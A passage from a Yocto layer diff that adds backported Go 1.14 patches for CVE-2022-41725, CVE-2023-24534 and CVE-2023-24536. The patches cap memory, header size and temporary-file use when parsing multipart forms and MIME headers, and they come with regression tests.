+- if g, w := res.StatusCode, StatusBadRequest; g != w {
++ if g, w := res.StatusCode, StatusOK; g != w {
+ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
+ }
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
+From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 25 Jan 2023 09:27:01 -0800
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
+
+Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
+in memory. Parsed forms can consume substantially more memory than
+this limit, since ReadForm does not account for map entry overhead
+and MIME headers.
+
+In addition, while the amount of disk memory consumed by ReadForm can
+be constrained by limiting the size of the parsed input, ReadForm will
+create one temporary file per form part stored on disk, potentially
+consuming a large number of inodes.
+
+Update ReadForm's memory accounting to include part names,
+MIME headers, and map entry overhead.
+
+Update ReadForm to store all on-disk file parts in a single
+temporary file.
+
+Files returned by FileHeader.Open are documented as having a concrete
+type of *os.File when a file is stored on disk. The change to use a
+single temporary file for all parts means that this is no longer the
+case when a form contains more than a single file part stored on disk.
+
+The previous behavior of storing each file part in a separate disk
+file may be reenabled with GODEBUG=multipartfiles=distinct.
+
+Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
+on the size of MIME headers.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+Updates #58006
+Fixes #58362
+Fixes CVE-2022-41725
+
+Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
+CVE: CVE-2022-41725
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 132 ++++++++++++++++++++-----
+ src/mime/multipart/formdata_test.go | 140 ++++++++++++++++++++++++++-
+ src/mime/multipart/multipart.go | 25 +++--
+ src/mime/multipart/readmimeheader.go | 14 +++
+ src/net/http/request_test.go | 2 +-
+ src/net/textproto/reader.go | 27 ++++++
+ 6 files changed, 303 insertions(+), 37 deletions(-)
+ create mode 100644 src/mime/multipart/readmimeheader.go
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 9c42ea8..1eeb340 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "math"
+@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
+
+ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
++ var (
++ file *os.File
++ fileOff int64
++ )
++ numDiskFiles := 0
++ multipartFiles := godebug.Get("multipartfiles")
++ combineFiles := multipartFiles != "distinct"
+ defer func() {
++ if file != nil {
++ if cerr := file.Close(); err == nil {
++ err = cerr
++ }
++ }
++ if combineFiles && numDiskFiles > 1 {
++ for _, fhs := range form.File {
++ for _, fh := range fhs {
++ fh.tmpshared = true
++ }
++ }
++ }
+ if err != nil {
+ form.RemoveAll()
++ if file != nil {
++ os.Remove(file.Name())
++ }
+ }
+ }()
+
+- // Reserve an additional 10 MB for non-file parts.
+- maxValueBytes := maxMemory + int64(10<<20)
+- if maxValueBytes <= 0 {
++ // maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
++ // Data past this limit is written to disk.
++ // This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
++ // since metadata is always stored in memory, not disk.
++ //
++ // maxMemoryBytes is the maximum bytes we will store in memory, including file content,
++ // non-file part values, metdata, and map entry overhead.
++ //
++ // We reserve an additional 10 MB in maxMemoryBytes for non-file data.
++ //
++ // The relationship between these parameters, as well as the overly-large and
++ // unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
++ // within the constraints of the API as documented.
++ maxFileMemoryBytes := maxMemory
++ maxMemoryBytes := maxMemory + int64(10<<20)
++ if maxMemoryBytes <= 0 {
+ if maxMemory < 0 {
+- maxValueBytes = 0
++ maxMemoryBytes = 0
+ } else {
+- maxValueBytes = math.MaxInt64
++ maxMemoryBytes = math.MaxInt64
+ }
+ }
+ for {
+- p, err := r.NextPart()
++ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+ break
+ }
+@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ filename := p.FileName()
+
++ // Multiple values for the same key (one map entry, longer slice) are cheaper
++ // than the same number of values for different keys (many map entries), but
++ // using a consistent per-value cost for overhead is simpler.
++ maxMemoryBytes -= int64(len(name))
++ maxMemoryBytes -= 100 // map overhead
++ if maxMemoryBytes < 0 {
++ // We can't actually take this path, since nextPart would already have
++ // rejected the MIME headers for being too large. Check anyway.
++ return nil, ErrMessageTooLarge
++ }
++
+ var b bytes.Buffer
+
+ if filename == "" {
+ // value, store as string in memory
+- n, err := io.CopyN(&b, p, maxValueBytes+1)
++ n, err := io.CopyN(&b, p, maxMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- maxValueBytes -= n
+- if maxValueBytes < 0 {
++ maxMemoryBytes -= n
++ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+ form.Value[name] = append(form.Value[name], b.String())
+@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ if maxMemoryBytes < 0 {
++ return nil, ErrMessageTooLarge
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+ }
+- n, err := io.CopyN(&b, p, maxMemory+1)
++ n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- if n > maxMemory {
+- // too big, write to disk and flush buffer
+- file, err := ioutil.TempFile("", "multipart-")
+- if err != nil {
+- return nil, err
++ if n > maxFileMemoryBytes {
++ if file == nil {
++ file, err = ioutil.TempFile(r.tempDir, "multipart-")
++ if err != nil {
++ return nil, err
++ }
+ }
++ numDiskFiles++
+ size, err := io.Copy(file, io.MultiReader(&b, p))
+- if cerr := file.Close(); err == nil {
+- err = cerr
+- }
+ if err != nil {
+- os.Remove(file.Name())
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+ fh.Size = size
++ fh.tmpoff = fileOff
++ fileOff += size
++ if !combineFiles {
++ if err := file.Close(); err != nil {
++ return nil, err
++ }
++ file = nil
++ }
+ } else {
+ fh.content = b.Bytes()
+ fh.Size = int64(len(fh.content))
+- maxMemory -= n
+- maxValueBytes -= n
++ maxFileMemoryBytes -= n
++ maxMemoryBytes -= n
+ }
+ form.File[name] = append(form.File[name], fh)
+ }
+@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ return form, nil
+ }
+
++func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ for k, vs := range h {
++ size += int64(len(k))
++ size += 100 // map entry overhead
++ for _, v := range vs {
++ size += int64(len(v))
++ }
++ }
++ return size
++}
++
+ // Form is a parsed multipart form.
+ // Its File parts are stored either in memory or on disk,
+ // and are accessible via the *FileHeader's Open method.
+@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
+ for _, fh := range fhs {
+ if fh.tmpfile != "" {
+ e := os.Remove(fh.tmpfile)
+- if e != nil && err == nil {
++ if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
+ err = e
+ }
+ }
+@@ -149,15 +217,25 @@ type FileHeader struct {
+ Header textproto.MIMEHeader
+ Size int64
+
+- content []byte
+- tmpfile string
++ content []byte
++ tmpfile string
++ tmpoff int64
++ tmpshared bool
+ }
+
+ // Open opens and returns the FileHeader's associated File.
+ func (fh *FileHeader) Open() (File, error) {
+ if b := fh.content; b != nil {
+ r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
+- return sectionReadCloser{r}, nil
++ return sectionReadCloser{r, nil}, nil
++ }
++ if fh.tmpshared {
++ f, err := os.Open(fh.tmpfile)
++ if err != nil {
++ return nil, err
++ }
++ r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
++ return sectionReadCloser{r, f}, nil
+ }
+ return os.Open(fh.tmpfile)
+ }
+@@ -176,8 +254,12 @@ type File interface {
+
+ type sectionReadCloser struct {
+ *io.SectionReader
++ io.Closer
+ }
+
+ func (rc sectionReadCloser) Close() error {
++ if rc.Closer != nil {
++ return rc.Closer.Close()
++ }
+ return nil
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index e3a3a3e..5cded71 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -6,8 +6,10 @@ package multipart
+
+ import (
+ "bytes"
++ "fmt"
+ "io"
+ "math"
++ "net/textproto"
+ "os"
+ "strings"
+ "testing"
+@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
+ maxMemory int64
+ err error
+ }{
+- {"smaller", 50, nil},
+- {"exact-fit", 25, nil},
++ {"smaller", 50 + int64(len("largetext")) + 100, nil},
++ {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+ {"too-large", 0, ErrMessageTooLarge},
+ }
+ for _, tc := range testCases {
+@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
+ defer f.RemoveAll()
+ }
+ if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
++ t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+ }
+ if err == nil {
+ if g := f.Value["largetext"][0]; g != largeTextValue {
+@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
+ })
+ }
+ }
++
++// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
++// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
++func TestReadForm_MetadataTooLarge(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ f func(*Writer)
++ }{{
++ name: "large name",
++ f: func(fw *Writer) {
++ name := strings.Repeat("a", 10<<20)
++ w, _ := fw.CreateFormField(name)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "large MIME header",
++ f: func(fw *Writer) {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition", `form-data; name="a"`)
++ h.Set("X-Foo", strings.Repeat("a", 10<<20))
++ w, _ := fw.CreatePart(h)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "many parts",
++ f: func(fw *Writer) {
++ for i := 0; i < 110000; i++ {
++ w, _ := fw.CreateFormField("f")
++ w.Write([]byte("v"))
++ }
++ },
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.f(fw)
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ _, err := fr.ReadForm(0)
++ if err != ErrMessageTooLarge {
++ t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
++// results in a single on-disk file.
++func TestReadForm_ManyFiles_Combined(t *testing.T) {
++ const distinct = false
++ testReadFormManyFiles(t, distinct)
++}
++
++// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
++// results in every file in a multipart form being placed in a distinct on-disk file.
++func TestReadForm_ManyFiles_Distinct(t *testing.T) {
++ t.Setenv("GODEBUG", "multipartfiles=distinct")
++ const distinct = true
++ testReadFormManyFiles(t, distinct)
++}
++
++func testReadFormManyFiles(t *testing.T, distinct bool) {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ const numFiles = 10
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ w, err := fw.CreateFormFile(name, name)
++ if err != nil {
++ t.Fatal(err)
++ }
++ w.Write([]byte(name))
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ fr.tempDir = t.TempDir()
++ form, err := fr.ReadForm(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ if got := len(form.File[name]); got != 1 {
++ t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
++ }
++ fh := form.File[name][0]
++ file, err := fh.Open()
++ if err != nil {
++ t.Fatalf("form.File[%q].Open() = %v", name, err)
++ }
++ if distinct {
++ if _, ok := file.(*os.File); !ok {
++ t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
++ }
++ }
++ got, err := io.ReadAll(file)
++ file.Close()
++ if string(got) != name || err != nil {
++ t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
++ }
++ }
++ dir, err := os.Open(fr.tempDir)
++ if err != nil {
++ t.Fatal(err)
++ }
++ defer dir.Close()
++ names, err := dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ wantNames := 1
++ if distinct {
++ wantNames = numFiles
++ }
++ if len(names) != wantNames {
++ t.Fatalf("temp dir contains %v files; want 1", len(names))
++ }
++ if err := form.RemoveAll(); err != nil {
++ t.Fatalf("form.RemoveAll() = %v", err)
++ }
++ names, err = dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(names) != 0 {
++ t.Fatalf("temp dir contains %v files; want 0", len(names))
++ }
++}
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 1750300..958cef8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders() error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := r.ReadMIMEHeader()
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize)
+ if err == nil {
+ bp.Header = header
+ }
++ // TODO: Add a distinguishable error to net/textproto.
++ if err != nil && err.Error() == "message too large" {
++ err = ErrMessageTooLarge
++ }
+ return err
+ }
+
+@@ -287,6 +291,7 @@ func (p *Part) Close() error {
+ // isn't supported.
+ type Reader struct {
+ bufReader *bufio.Reader
++ tempDir string // used in tests
+
+ currentPart *Part
+ partsRead int
+@@ -297,6 +302,10 @@ type Reader struct {
+ dashBoundary []byte // "--boundary"
+ }
+
++// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
++// including header keys, values, and map overhead.
++const maxMIMEHeaderSize = 10 << 20
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -304,7 +313,7 @@ type Reader struct {
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false)
++ return r.nextPart(false, maxMIMEHeaderSize)
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true)
++ return r.nextPart(true, maxMIMEHeaderSize)
+ }
+
+-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+new file mode 100644
+index 0000000..6836928
+--- /dev/null
++++ b/src/mime/multipart/readmimeheader.go
+@@ -0,0 +1,14 @@
++// Copyright 2023 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++package multipart
++
++import (
++ "net/textproto"
++ _ "unsafe" // for go:linkname
++)
++
++// readMIMEHeader is defined in package net/textproto.
++//
++//go:linkname readMIMEHeader net/textproto.readMIMEHeader
++func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 94133ee..170d3f5 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
+ t.Errorf("FormFile file = %v, want nil", f)
+ }
+ if fh != nil {
+- t.Errorf("FormFile file header = %q, want nil", fh)
++ t.Errorf("FormFile file header = %v, want nil", fh)
+ }
+ if err != ErrMissingFile {
+ t.Errorf("FormFile err = %q, want ErrMissingFile", err)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index f63f5ec..96553fb 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -7,9 +7,11 @@ package textproto
+ import (
+ "bufio"
+ "bytes"
++ "errors"
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "strconv"
+ "strings"
+ "sync"
+@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
++ return readMIMEHeader(r, math.MaxInt64)
++}
++
++// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
++// It is called by the mime/multipart package.
++func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ continue
+ }
+
++ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
++ //
++ // value is computed as
++ // value := string(bytes.TrimLeft(v, " \t"))
++ //
++ // in the original patch from 1.19. This relies on
++ // 'v' which does not exist in 1.14. We leave the
++ // 1.14 method unchanged.
++
+ // Skip initial spaces in value.
+ i++ // skip colon
+ for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
+@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ value := string(kv[i:])
+
+ vv := m[key]
++ if vv == nil {
++ lim -= int64(len(key))
++ lim -= 100 // map entry overhead
++ }
++ lim -= int64(len(value))
++ if lim < 0 {
++ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
++ // to allow mime/multipart to detect it.
++ return m, errors.New("message too large")
++ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+ // Most headers aren't multi-valued.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
+From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 10 Mar 2023 14:21:05 -0800
+Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
+ the number of MIME header keys
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: I675451438d619a9130360c56daf529559004903f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
+CVE: CVE-2023-24534
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/bytes/bytes.go | 13 +++++++
+ src/net/textproto/reader.go | 31 +++++++++++------
+ src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
+ 3 files changed, 92 insertions(+), 11 deletions(-)
+
+diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
+index e872cc2..1f0d760 100644
+--- a/src/bytes/bytes.go
++++ b/src/bytes/bytes.go
+@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
+ return -1
+ }
+
++// Cut slices s around the first instance of sep,
++// returning the text before and after sep.
++// The found result reports whether sep appears in s.
++// If sep does not appear in s, cut returns s, nil, false.
++//
++// Cut returns slices of the original slice s, not copies.
++func Cut(s, sep []byte) (before, after []byte, found bool) {
++ if i := Index(s, sep); i >= 0 {
++ return s[:i], s[i+len(sep):], true
++ }
++ return s, nil, false
++}
++
+ func indexRabinKarp(s, sep []byte) int {
+ // Rabin-Karp search
+ hashsep, pow := hashStr(sep)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index a505da9..8d547fe 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+ var strs []string
+- hint := r.upcomingHeaderNewlines()
++ hint := r.upcomingHeaderKeys()
+ if hint > 0 {
++ if hint > 1000 {
++ hint = 1000 // set a cap to avoid overallocation
++ }
+ strs = make([]string, hint)
+ }
+
+@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
+ return nil
+ }
+
+-// upcomingHeaderNewlines returns an approximation of the number of newlines
++var nl = []byte("\n")
++
++// upcomingHeaderKeys returns an approximation of the number of keys
+ // that will be in this header. If it gets confused, it returns 0.
+-func (r *Reader) upcomingHeaderNewlines() (n int) {
++func (r *Reader) upcomingHeaderKeys() (n int) {
+ // Try to determine the 'hint' size.
+ r.R.Peek(1) // force a buffer load if empty
+ s := r.R.Buffered()
+@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
+ return
+ }
+ peek, _ := r.R.Peek(s)
+- for len(peek) > 0 {
+- i := bytes.IndexByte(peek, '\n')
+- if i < 3 {
+- // Not present (-1) or found within the next few bytes,
+- // implying we're at the end ("\r\n\r\n" or "\n\n")
+- return
++ for len(peek) > 0 && n < 1000 {
++ var line []byte
++ line, peek, _ = bytes.Cut(peek, nl)
++ if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
++ // Blank line separating headers from the body.
++ break
++ }
++ if line[0] == ' ' || line[0] == '\t' {
++ // Folded continuation of the previous line.
++ continue
+ }
+ n++
+- peek = peek[i+1:]
+ }
+- return
++ return n
+ }
+
+ // CanonicalMIMEHeaderKey returns the canonical format of the
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3124d43..3ae0de1 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -9,6 +9,7 @@ import (
+ "bytes"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
+ }
+ }
+
++// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
++// difficult to test well via the external API.
++func TestReaderUpcomingHeaderKeys(t *testing.T) {
++ for _, test := range []struct {
++ input string
++ want int
++ }{{
++ input: "",
++ want: 0,
++ }, {
++ input: "A: v",
++ want: 1,
++ }, {
++ input: "A: v\r\nB: v\r\n",
++ want: 2,
++ }, {
++ input: "A: v\nB: v\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n continued\r\n still continued\r\nB: v\r\n\r\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
++ want: 1,
++ }, {
++ input: "A: v" + strings.Repeat("\n", 1000),
++ want: 1,
++ }} {
++ r := reader(test.input)
++ got := r.upcomingHeaderKeys()
++ if test.want != got {
++ t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
++ }
++ }
++}
++
+ func TestReadMIMEHeaderNoKey(t *testing.T) {
+ r := reader(": bar\ntest-1: 1\n\n")
+ m, err := r.ReadMIMEHeader()
+@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
+ }
+ }
+
++// Test that reading a header doesn't overallocate. Issue 58975.
++func TestReadMIMEHeaderAllocations(t *testing.T) {
++ var totalAlloc uint64
++ const count = 200
++ for i := 0; i < count; i++ {
++ r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
++ var m1, m2 runtime.MemStats
++ runtime.ReadMemStats(&m1)
++ _, err := r.ReadMIMEHeader()
++ if err != nil {
++ t.Fatalf("ReadMIMEHeader: %v", err)
++ }
++ runtime.ReadMemStats(&m2)
++ totalAlloc += m2.TotalAlloc - m1.TotalAlloc
++ }
++ // 32k is large and we actually allocate substantially less,
++ // but prior to the fix for #58975 we allocated ~400k in this case.
++ if got, want := totalAlloc/count, uint64(32768); got > want {
++ t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
++ }
++}
++
+ type readResponseTest struct {
+ in string
+ inCode int
+--
+2.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
+From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 14:18:04 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
+ buffer allocations in ReadForm
+
+When copying form data to disk with io.Copy,
+allocate only one copy buffer and reuse it rather than
+creating two buffers per file (one from io.multiReader.WriteTo,
+and a second one from os.File.ReadFrom).
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
